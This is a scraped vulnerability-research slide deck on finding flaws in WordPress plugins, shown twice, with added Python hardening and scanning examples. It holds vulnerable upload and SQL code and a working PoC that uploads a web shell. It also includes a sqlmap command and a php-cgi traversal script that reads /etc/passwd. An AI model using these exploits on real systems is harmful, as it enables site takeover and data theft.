Hacking WordPress Plugins
Larry W. Cashdollar
8/1/2015
v1.2
What is WordPress
• Content Management System (CMS)
• 23% of all websites (3/23/15)
• Plugins - add functionality
• Plugins may be authored by anyone
Why hack WordPress plugins?
• #1 CMS by number and percentage
• Poor security model
• Lack of QA on 3rd party plugins
• More fun than Ruby Gems
Methodology
• Large code footprint with plugins and themes
• Prefer no authentication required to exploit*
• Look for PHP code that might be exploitable
• Search specific traits or patterns:
– upload.php
– download.php
– proxy.php
Requirements
• Processes user input
• Has reachable code, not just defining a class
• Doesn’t check if accessed directly
• Doesn’t require authentication
• Doesn’t require WP API hooks*
Vulnerabilities
• LFI
• RFI
• RCE
• Open Proxies
• SQL Injection
• XSS
Plugin Code Criteria
• No $_POST / $_GET / $_FILES / $_REQUEST usage: PUNT
• if (!defined(ABSPATH)) die; : PUNT
• if (!is_admin()) die; : PUNT
• Only function/class definitions (function foo() {}; class Bar {}), nothing reachable: PUNT
• May have injectable SELECT, INSERT, DELETE, UPDATE, etc.
A Quick Look
• Download a few random plugins
• Examine files named upload.php or download.php
• Found RFI in videowhisper-video-presentation
• The code:
<?php

if ($_GET["room"]) $room=$_GET["room"];
if ($_POST["room"]) $room=$_POST["room"];
$filename=$_FILES['vw_file']['name'];

include_once("incsan.php");
sanV($room);
if (!$room) exit;
sanV($filename);
if (!$filename) exit;

if (strstr($filename,'.php')) exit;

//do not allow uploads to other folders
if ( strstr($room,"/") || strstr($room,"..") ) exit;
if ( strstr($filename,"/") || strstr($filename,"..") ) exit;

$destination="uploads/".$room."/";
if ($_GET["slides"]) $destination .= "slides/";

$ext=strtolower(substr($filename,-4));

$allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi",".mpg",".ppt",".pps");

if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename);
?>loadstatus=1
Exploiting it
• Upload .phtml .shtml
• Execute as www-data user
• Previously patched (I circumvented)*
• Also present in videowhisper-video-conference-integration
* Annoying but still fun
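Why the videowhisper check above accepts .phtml and .shtml, and what a stricter check looks like, as an added Python model of the PHP logic on the slide (not the plugin's own code): the slide's version compares only the last four characters, so any name ending in "html" passes, while the hardened version compares the whole extension against an allow-list and also refuses names with an inner script-handler segment, which goes one step beyond what the slide shows.

```python
"""Model of the videowhisper upload extension check and a hardened version.
Added example; the plugin's real code is the PHP shown on the slide."""
import os

# The slide's allow-list, as written: entries are the LAST FOUR characters of the
# name, which is why "jpeg", "docx" and "html" appear without a leading dot.
SLIDE_ALLOWED = [".swf", ".zip", ".rar", ".jpg", "jpeg", ".png", ".gif", ".txt",
                 ".doc", "docx", ".htm", "html", ".pdf", ".mp3", ".flv", ".avi",
                 ".mpg", ".ppt", ".pps"]

# Whole extensions the hardened check accepts, and extensions a typical web
# server hands to a script handler (PHP, SSI, CGI) that must never be stored
# under the document root whatever else the name contains.
ALLOWED_EXT = {"swf", "zip", "rar", "jpg", "jpeg", "png", "gif", "txt", "doc",
               "docx", "htm", "html", "pdf", "mp3", "flv", "avi", "mpg", "ppt", "pps"}
HANDLER_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "shtml",
               "cgi", "pl", "htaccess"}


def slide_check(filename: str) -> bool:
    """The slide's logic: reject '.php' anywhere, reject path characters, then
    accept if strtolower(substr($filename, -4)) is in the list."""
    if ".php" in filename:
        return False
    if "/" in filename or ".." in filename:
        return False
    return filename[-4:].lower() in SLIDE_ALLOWED


def hardened_check(filename: str) -> bool:
    """Compare the full extension, require a non-empty base name, and refuse
    any dotted segment that names a script handler (Apache can map a handler
    from an inner segment, so x.php.jpg is not a safe name either)."""
    if os.path.basename(filename) != filename or ".." in filename:
        return False                       # no directory components at all
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False                       # needs "name.ext", no dotfiles
    if parts[-1] not in ALLOWED_EXT:
        return False
    return not any(seg in HANDLER_EXT for seg in parts[1:-1])


if __name__ == "__main__":
    for name in ["talk.pdf", "shell.phtml", "shell.shtml", "shell.php", ".htaccess"]:
        print(f"{name:14} slide={str(slide_check(name)):5} hardened={hardened_check(name)}")
```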
Initial Progress
• Downloaded 10 random plugins
• Found RFI in two of them!
• Plugins had ~ 5k downloads
• Must be more vulnerabilities out there
Automate?
• Download lots of plugins
• grep code for specific patterns?
• Same idea as Ruby Gem research I did
• Easy to test with PoC
• More fun!
• Maybe write code to flag high risk code?
Code Ferret v1.0 Feature Doc
• Supply list of .php files to examine
• Check for user input
• Ignore if author checks for ABSPATH etc.
• Look for SQL functions
• Flag if use of WP API
• Flag if include files
Code Ferret v1.0 Design Doc
• Look for specific functions and strings
• Anything of interest added to link list
• Link list stores line number and reason for flag
• Dump output & statistics
• ANSI COLOR!
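A small Python re-implementation of the triage rules from the Plugin Code Criteria and Code Ferret slides, added here as an example; it is not the author's Ferret, whose source is not on the page. It punts on files with no user input, an ABSPATH or is_admin guard, or nothing but definitions, and otherwise records line number and reason for each flag; the PHP samples are constructed.

```python
"""Ferret-style triage of PHP plugin files (added example, not the author's tool).

Rules mirrored from the slides: punt when there is no $_GET/$_POST/$_FILES/$_REQUEST,
when the file guards against direct access (ABSPATH / is_admin), or when it only
defines classes/functions; otherwise record (line, reason) for user input, SQL
statements, WordPress API calls and include/require.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

USER_INPUT = re.compile(r"\$_(GET|POST|FILES|REQUEST|COOKIE)\b")
ABSPATH_GUARD = re.compile(r"defined\s*\(\s*['\"]?ABSPATH['\"]?\s*\)")
ADMIN_GUARD = re.compile(r"\bis_admin\s*\(")
SQL_VERB = re.compile(r"\b(SELECT|INSERT|UPDATE|DELETE)\b")   # upper case only, fewer false hits
WP_API = re.compile(r"\$wpdb->\w+|\b(?:get_option|add_action|trailingslashit|wp_\w+)\b")
INCLUDE = re.compile(r"\b(include|include_once|require|require_once)\b")
DEFINITION = re.compile(r"^\s*(?:abstract\s+|final\s+)?(?:class|function|interface|trait)\b")
SKIP_PREFIXES = ("<?", "?>", "//", "#", "/*", "*", "}")


@dataclass
class Report:
    path: str
    punt: Optional[str] = None                      # why the file was skipped
    flags: List[Tuple[int, str]] = field(default_factory=list)


def scan_php(path: str, source: str) -> Report:
    """Apply the punt rules, then collect (line number, reason) flags."""
    rep = Report(path)
    lines = source.splitlines()
    if not any(USER_INPUT.search(line) for line in lines):
        rep.punt = "no user input ($_GET/$_POST/$_FILES/$_REQUEST)"
        return rep
    depth = 0            # brace depth; heuristic, ignores braces inside strings
    reachable = False    # seen a top-level statement that is not a definition?
    for no, line in enumerate(lines, 1):
        if ABSPATH_GUARD.search(line):
            rep.punt = f"line {no}: ABSPATH guard, direct access is blocked"
            return rep
        if ADMIN_GUARD.search(line):
            rep.punt = f"line {no}: is_admin guard"
            return rep
        stripped = line.strip()
        if (depth == 0 and stripped and not stripped.startswith(SKIP_PREFIXES)
                and not DEFINITION.match(line)):
            reachable = True
        if USER_INPUT.search(line):
            rep.flags.append((no, "user input"))
        if SQL_VERB.search(line):
            rep.flags.append((no, "SQL statement"))
        if WP_API.search(line):
            rep.flags.append((no, "WordPress API call"))
        if INCLUDE.search(line):
            rep.flags.append((no, "include/require"))
        depth += line.count("{") - line.count("}")
    if not reachable:
        rep.punt = "only class/function definitions, no reachable top-level code"
    return rep


def describe(rep: Report) -> str:
    """One printable summary per file, in the spirit of the Ferret dump."""
    if rep.punt:
        return f"{rep.path}: PUNT ({rep.punt})"
    return f"{rep.path}:\n" + "\n".join(f"  line {no}: {why}" for no, why in rep.flags)


# Constructed samples modelled on the patterns shown in the slides.
UPLOAD_SAMPLE = """<?php
if ($_GET["room"]) $room = $_GET["room"];
$filename = $_FILES['vw_file']['name'];
include_once("incsan.php");
$destination = "uploads/" . $room . "/";
$wpdb->query("INSERT INTO " . $wpdb->prefix . "pp_images VALUES (" . $_REQUEST['albumid'] . ")");
if (in_array($ext, $allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename);
"""
GUARDED_SAMPLE = """<?php
if (!defined('ABSPATH')) exit;
$id = intval($_GET['id']);
"""
CLASS_ONLY_SAMPLE = """<?php
class Gallery_Uploader {
    public function handle() {
        $name = $_POST['name'];
    }
}
"""

if __name__ == "__main__":
    for name, src in [("upload.php", UPLOAD_SAMPLE), ("guarded.php", GUARDED_SAMPLE),
                      ("class.php", CLASS_ONLY_SAMPLE)]:
        print(describe(scan_php(name, src)))
```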
Semi Automatic
• git pull https://plugins.svn.wordpress.org
• Scraped Plugins off wordpress.org
• Downloaded 36,000 plugins
• About 20 GB of data
• upload.php or download.php
• Use Ferret v1.0 to quickly examine lots of files
• Profit! Err, get some CVEs
Ferret output
Ferret First Run
• wp-powerplaygallery v3.3
• Flagged for user input with no access controls
• Accesses WordPress API calls
• Loads WordPress functions via require_once()
• Code examination turns up RFI and Blind SQLi!
wp-powerplaygallery RFI Code
if (!empty($_FILES)) {
  if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) {
    die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."} , "id" : "id"}');
  }

  // Read binary input stream and append it to temp file
  if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
    die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
  }
  ...
  while ($buff = fread($in, 4096)) {
    fwrite($out, $buff);
  }
wp-powerplaygallery SQLI code
$query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date` )
          VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST['name']."',1,'','NULL')";
$wpdb->query($query);
RFI Exploit Requirements
• POST request
• Variable albumid must point at an existing album in the database
• File to upload must exist locally
• Use c99 shell as our payload
• file variable contains payload with local full path
• name variable contains our filename
PoC Exploit
<?php
/* Remote shell upload exploit for wp-powerplaygallery v3.3 */
/* Larry W. Cashdollar @_larry0
   6/27/2015
   albumid needs to be a numeric value matching an existing album number, 1 is probably a good start
   but you can enumerate these by using curl, and looking for redirect 301 responses:
   e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big
   ->301 exists else 404 doesn't.
   shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php
*/

$target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
$file_name_with_full_path = '/var/www/shell.php';

echo "POST to $target_url $file_name_with_full_path";
$post = array('albumid'=>'1' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>
Blind SQLi Exploit
• Sqlmap
$ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php --data "albumid=1" --dbms mysql --level 5 --risk 3
Lazy Exploits
• Started using php-cgi to test exploits
• The script Poc.sh
#!/bin/sh
export GATEWAY_INTERFACE=CGI/1.1
export PATH_TRANSLATED=UserSettings.php
export QUERY_STRING=network=../../../../../../../../etc/passwd
export REDIRECT_STATUS=CGI
export REQUEST_METHOD=GET
php-cgi ./plugin/buddystream/extensions/default/templates/UserSettings.php
$ ./Poc.sh
Pitfalls of Exploitation
• Exploitable code is a class and isn’t reachable*
• Code uses WordPress functions or functions from other segments of code with no includes
• Code is incomplete or just broken
• Someone discovered it last year
Fatal Errors
• [Thu Aug 06 07:22:58 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function trailingslashit() in /usr/share/wordpress/wp-content/plugins/ckeditor-for-wordpress/ckeditor_class.php on line 27
• [Sun Aug 02 13:55:06 2015] [error] [client 192.168.0.2] PHP Fatal error: require_once(): Failed opening required '/etc/wordpress/wp-settings.php' (include_path='.:/usr/share/php:/usr/share/pear') in /etc/wordpress/config-www.vapidlabs.com.php on line 90
• [Sun Aug 02 19:28:11 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20
• [Sun Aug 02 19:28:24 2015] [error] [client 192.168.0.16] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20
• [Sun Aug 02 19:28:28 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20
Vulnerable and Broken
<?php
$uploaddir = 'uploads/'; // This needs to be the full path
$file = $uploaddir . basename($_FILES['uploadfile']['name']);
if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $file)) {
  echo "success";
} else {
  echo "error";
}
?>
Oddities
• Returns the local IP address of the server
• Prints the full filesystem path of the web server
• Plugin that downloads itself ?!
Statistics
• 20 CVEs
• 26* Vulnerabilities found
• 6 were previously discovered and not included*
• All in all 32 Vulnerabilities discovered
• Dozens of known exploitable vulnerabilities remain unpatched
* I now google ‘<pluginname> vulnerability’ before bothering to document
Improvements
• Parse php scripts checking for reachable code
• Use RIPS v1.0 (thanks Chad!)
• Circle back and examine vulnerabilities that require login to WP for exploitation
Questions?
• larry@akamai.com
• Twitter @_larry0
Who Am I
• 15 years at Akamai Technologies
• Hobbyist Vulnerability Researcher
• 75+ CVEs
• Formerly Unix Systems Administrator 17 years
• Penetration Tester Back in Late 90s
• Enjoy Writing and Breaking Code

 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
 
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...Call Girls In Mukherjee Nagar 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
 
What is Binary Language? Computer Number Systems
What is Binary Language?  Computer Number SystemsWhat is Binary Language?  Computer Number Systems
What is Binary Language? Computer Number Systems
 
DNT_Corporate presentation know about us
DNT_Corporate presentation know about usDNT_Corporate presentation know about us
DNT_Corporate presentation know about us
 

Hacking Wordpress Plugins

1. Hacking WordPress Plugins
Larry W. Cashdollar
8/1/2015
v1.2

2. What is WordPress
• Content Management System (CMS)
• 23% of all websites (3/23/15)
• Plugins - add functionality
• Plugins may be authored by anyone

3. Why hack WordPress plugins?
• #1 CMS by number and percentage
• Poor security model
• Lack of QA on 3rd party plugins
• More fun than Ruby Gems

4. Methodology
• Large code footprint with plugins and themes
• Prefer no authentication required to exploit*
• Look for PHP code that might be exploitable
• Search specific traits or patterns:
– upload.php
– download.php
– proxy.php

5. Requirements
• Processes user input
• Has reachable code, not just defining a class
• Doesn’t check if accessed directly
• Doesn’t require authentication
• Doesn’t require WP API hooks*

6. Vulnerabilities
• LFI
• RFI
• RCE
• Open Proxies
• SQL Injection
• XSS

7. Plugin Code Criteria
• Doesn’t have POST/GET/FILE/REQUEST: PUNT
• If (!defined(ABSPATH)) die; PUNT
• If (!is_admin) die; PUNT
• Function class() {}; PUNT
• May have injectable SELECT, INSERT, DELETE, UPDATE, etc.

8. A Quick Look
• Download a few random plugins
• Examine files named upload.php or download.php
• Found RFI in videowhisper-video-presentation
• The code:

9. videowhisper-video-presentation upload.php
<?php

if ($_GET["room"]) $room=$_GET["room"];
if ($_POST["room"]) $room=$_POST["room"];
$filename=$_FILES['vw_file']['name'];

include_once("incsan.php");
sanV($room);
if (!$room) exit;
sanV($filename);
if (!$filename) exit;

if (strstr($filename,'.php')) exit;

//do not allow uploads to other folders
if ( strstr($room,"/") || strstr($room,"..") ) exit;
if ( strstr($filename,"/") || strstr($filename,"..") ) exit;

$destination="uploads/".$room."/";
if ($_GET["slides"]) $destination .= "slides/";

// only the last four characters of the name are compared, so ".phtml" and
// ".shtml" match the "html" entry below (see the next slide)
$ext=strtolower(substr($filename,-4));
$allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi",".mpg",".ppt",".pps");

if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename);
?>loadstatus=1

10. Exploiting it
• Upload .phtml .shtml
• Execute as www-data user
• Previously patched (I circumvented)*
• Also present in videowhisper-video-conference-integration
* Annoying but still fun
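Why the allow-list on slide 9 lets a .phtml through, as an added example that is not code from the slides or from the plugin: the plugin's check is restated in Python next to a stricter whole-extension check and both are run on the same names. The hardened allow-list is an assumption mirroring the plugin's intent, and the unknown sanV() from incsan.php is not modelled.

```python
# Model of the extension check in the VideoWhisper upload.php shown above
# (added example, not the plugin's code): the PHP logic is restated in
# Python so the weak check and a stricter one can be compared on the same
# names. The sanV() call from incsan.php is unknown and not modelled.
import posixpath

# Allow-list exactly as the plugin spells it: four-character tails, some
# with a leading dot and some (jpeg, docx, html) without one.
ALLOWED_TAILS = [".swf", ".zip", ".rar", ".jpg", "jpeg", ".png", ".gif",
                 ".txt", ".doc", "docx", ".htm", "html", ".pdf", ".mp3",
                 ".flv", ".avi", ".mpg", ".ppt", ".pps"]

# Whole extensions a stricter check accepts (assumption: mirrors the plugin's
# intent; a site should trim this to what it actually serves).
ALLOWED_EXTENSIONS = {"swf", "zip", "rar", "jpg", "jpeg", "png", "gif", "txt",
                      "doc", "docx", "htm", "html", "pdf", "mp3", "flv",
                      "avi", "mpg", "ppt", "pps"}

def plugin_accepts(filename: str) -> bool:
    """The original logic: exit if '.php' occurs anywhere, then compare
    strtolower(substr($filename, -4)) against the list with in_array()."""
    if ".php" in filename:
        return False
    tail = filename[-4:].lower()      # substr($filename, -4)
    # ".phtml" and ".shtml" both end in "html", so they pass this test
    return tail in ALLOWED_TAILS

def hardened_accepts(filename: str) -> bool:
    """Stricter check: bare file name only, exactly one extension, and the
    whole extension (not its last four characters) must be allow-listed."""
    name = posixpath.basename(filename)
    if name != filename or ".." in name:      # no directory components
        return False
    parts = name.lower().split(".")
    if len(parts) != 2 or not parts[0]:       # one extension, non-empty stem
        return False
    return parts[1] in ALLOWED_EXTENSIONS

if __name__ == "__main__":
    for name in ("slides.pdf", "deck.phtml", "page.shtml", "a.php.txt"):
        print(f"{name:12} plugin={plugin_accepts(name)!s:5} hardened={hardened_accepts(name)}")
```

The whole-extension check closes the gap the slide describes; a complete fix also keeps uploads somewhere the web server will not execute scripts.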
11. Initial Progress
• Downloaded 10 random plugins
• Found RFI in two of them!
• Plugins had ~ 5k downloads
• Must be more vulnerabilities out there

12. Automate?
• Download lots of plugins
• grep code for specific patterns?
• Same idea as Ruby Gem research I did
• Easy to test with PoC
• More fun!
• Maybe write code to flag high risk code?

13. Code Ferret v1.0 Feature Doc
• Supply list of .php files to examine
• Check for user input
• Ignore if author checks for ABSPATH etc.
• Look for SQL functions
• Flag if use of WP API
• Flag if include files

14. Code Ferret v1.0 Design Doc
• Look for specific functions and strings
• Anything of interest added to linked list
• Linked list stores line number and reason for flag
• Dump output & statistics
• ANSI COLOR!
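One way to implement the Ferret feature and design docs above, as an added example and not the author's Ferret tool: a single pass over PHP source records each hit with its line number and reason, then a verdict applies the PUNT rules from the "Plugin Code Criteria" slide. The regexes and rule names are this example's own approximations, and the sample input is a constructed cut-down of the slide 9 upload handler.

```python
# Ferret-style triage of a PHP file (added example, not the author's Ferret
# tool; the regexes approximate the strings the slides say it looks for).
# Each hit keeps its line number and reason; the verdict applies the PUNT rules.
import re
from dataclasses import dataclass, field

RULES = [
    ("user input",   re.compile(r"\$_(GET|POST|FILES|REQUEST)\b")),
    ("access guard", re.compile(r"defined\s*\(\s*['\"]?ABSPATH|\bis_admin\s*\(")),
    ("class def",    re.compile(r"^\s*(abstract\s+)?class\s+\w+")),
    ("SQL",          re.compile(r"\b(SELECT|INSERT|UPDATE|DELETE)\b", re.I)),
    ("WP API",       re.compile(r"\$wpdb\b|\bget_option\s*\(|\bwp_\w+\s*\(")),
    ("include",      re.compile(r"\b(include|require)(_once)?\b")),
    ("file write",   re.compile(r"\b(move_uploaded_file|fwrite)\s*\(")),
]

@dataclass
class Report:
    hits: list = field(default_factory=list)   # (line_no, reason, text)

    def verdict(self) -> str:
        r = {reason for _, reason, _ in self.hits}
        if "user input" not in r:
            return "PUNT: no user input"
        if "access guard" in r:
            return "PUNT: access control present"
        if "class def" in r:
            return "PUNT: class definition, check reachability"
        flags = sorted(r & {"SQL", "WP API", "include", "file write"})
        return "REVIEW: " + ", ".join(flags) if flags else "REVIEW"

def ferret(source: str) -> Report:
    """One pass over the source; comment-only lines are skipped."""
    report = Report()
    for no, line in enumerate(source.splitlines(), start=1):
        text = line.strip()
        if text.startswith(("//", "#", "*")):
            continue
        for reason, pat in RULES:
            if pat.search(line):
                report.hits.append((no, reason, text))
    return report

# Constructed sample with the shape of the VideoWhisper upload handler above.
SAMPLE = """<?php
if ($_GET["room"]) $room=$_GET["room"];
$filename=$_FILES['vw_file']['name'];
include_once("incsan.php");
if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename);
?>"""
```

Calling ferret(SAMPLE).verdict() yields "REVIEW: file write, include", the same outcome the slides reach by hand for that file; swap SAMPLE for the contents of any upload.php or download.php to triage it.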
15. Semi Automatic
• git pull https://plugins.svn.wordpress.org
• Scraped Plugins off wordpress.org
• Downloaded 36,000 plugins
• About 20 GB of data
• upload.php or download.php
• Use Ferret v1.0 to quickly examine lots of files
• Profit! Err get some CVEs

17. Ferret First Run
• wp-powerplaygallery v3.3
• Flagged for user input with no access controls
• Accesses WordPress API calls
• Loads WordPress functions via require_once()
• Code examination turns up RFI and Blind SQLi!

18. wp-powerplaygallery RFI Code
if (!empty($_FILES)) {
  if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) {
    die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."} , "id" : "id"}');
  }

  // Read binary input stream and append it to temp file
  if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
    die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
  }
  ...
  // nothing in the shown excerpt checks the file name or type before the copy
  while ($buff = fread($in, 4096)) {
    fwrite($out, $buff);
  }

19. wp-powerplaygallery SQLi code
// $_REQUEST['albumid'] and $_REQUEST['name'] are concatenated into the query unescaped
$query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date` ) VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST['name']."',1,'','NULL')";
$wpdb->query($query);

20. RFI Exploit Requirements
• POST request
• Variable albumid must point at existing album in database
• File to upload must exist locally
• Use c99 shell as our payload
• file variable contains payload with local full path
• name variable contains our filename

21. PoC Exploit
<?php
/*Remote shell upload exploit for wp-powerplaygallery v3.3 */
/*Larry W. Cashdollar @_larry0
6/27/2015
albumid needs to be a numeric value matching an existing album number, 1 is probably a good start
but you can enumerate these by using curl, and looking for redirect 301 responses:
e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big
->301 exists else 404 doesn't.
shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php
*/

$target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
$file_name_with_full_path = '/var/www/shell.php';

echo "POST to $target_url $file_name_with_full_path";
$post = array('albumid'=>'1' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>

22. Blind SQLi Exploit
• Sqlmap
$ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php --data "albumid=1" --dbms mysql --level 5 --risk 3

23. Lazy Exploits
• Started using php-cgi to test exploits
• The script Poc.sh
#!/bin/sh
export GATEWAY_INTERFACE=CGI/1.1
export PATH_TRANSLATED=UserSettings.php
export QUERY_STRING=network=../../../../../../../../etc/passwd
export REDIRECT_STATUS=CGI
export REQUEST_METHOD=GET
php-cgi ./plugin/buddystream/extensions/default/templates/UserSettings.php

$ ./Poc.sh

24. Pitfalls of Exploitation
• Exploitable code is a class and isn’t reachable*
• Code uses WordPress functions or functions from other segments of code with no includes
• Code is incomplete or just broken
• Someone discovered it last year

25. Fatal Errors
• [Thu Aug 06 07:22:58 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function trailingslashit() in /usr/share/wordpress/wp-content/plugins/ckeditor-for-wordpress/ckeditor_class.php on line 27
• [Sun Aug 02 13:55:06 2015] [error] [client 192.168.0.2] PHP Fatal error: require_once(): Failed opening required '/etc/wordpress/wp-settings.php' (include_path='.:/usr/share/php:/usr/share/pear') in /etc/wordpress/config-www.vapidlabs.com.php on line 90
• [Sun Aug 02 19:28:11 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20
• [Sun Aug 02 19:28:24 2015] [error] [client 192.168.0.16] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20
• [Sun Aug 02 19:28:28 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20

26. Vulnerable and Broken
<?php
$uploaddir = 'uploads/';   // This needs to be full path
$file = $uploaddir . basename($_FILES['uploadfile']['name']);
if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $file)) {
  echo "success";
} else {
  echo "error";
}
?>

27. Oddities
• Return local IP address of server
• Prints the FULL path of the webserver
• Plugin that downloads itself ?!

28. Statistics
• 20 CVEs
• 26* Vulnerabilities found
• 6 were previously discovered and not included*
• All in all 32 Vulnerabilities discovered
• Dozens of known exploitable vulnerabilities remain unpatched
* I now google ‘<pluginname> vulnerability’ before bothering to document

29. Improvements
• Parse php scripts checking for reachable code
• Use RIPS v1.0 (thanks Chad!)
• Circle back and examine vulnerabilities that require login to WP for exploitation

31. Who Am I
• 15 years at Akamai Technologies
• Hobbyist Vulnerability Researcher
• 75+ CVEs
• Formerly Unix Systems Administrator 17 years
• Penetration Tester Back in Late 90s
• Enjoy Writing and Breaking Code